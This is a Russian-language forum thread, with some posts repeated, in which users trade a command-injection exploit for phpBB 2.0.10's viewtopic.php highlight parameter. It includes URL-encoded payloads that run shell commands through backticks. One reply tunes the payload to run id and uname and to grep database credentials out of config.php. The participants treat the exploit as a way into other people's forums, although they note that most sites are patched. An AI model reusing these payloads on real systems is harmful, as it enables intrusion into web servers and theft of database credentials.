Привет всем!
Господа, подскажите, плиз, что не так.
Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=cd%20..;id;ls;pwd
Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите.
Заранее спасибо.

Юзай мазилку и пользуйся expl. для cookie 8)) Последнее видео качни одно снял KEZ второе max_pain.

гЫ на большиствах форумах етот эксплоит уже не пашет!! даже на тех из видио...

значит patched :)

Привет всем!
Господа, подскажите, плиз, что не так.
Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=cd%20..;id;ls;pwd
Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите.
Заранее спасибо.

Попробуй лучше вот так:

&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db

Попробуй лучше вот так:

&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
Так тоже пробовал, не помогает.

Да, тот метод закрывается легко.
Кому интересно как, см. на моем форуме: http://hacsoft.h14.ru/phpBB2/viewtopic.php?t=94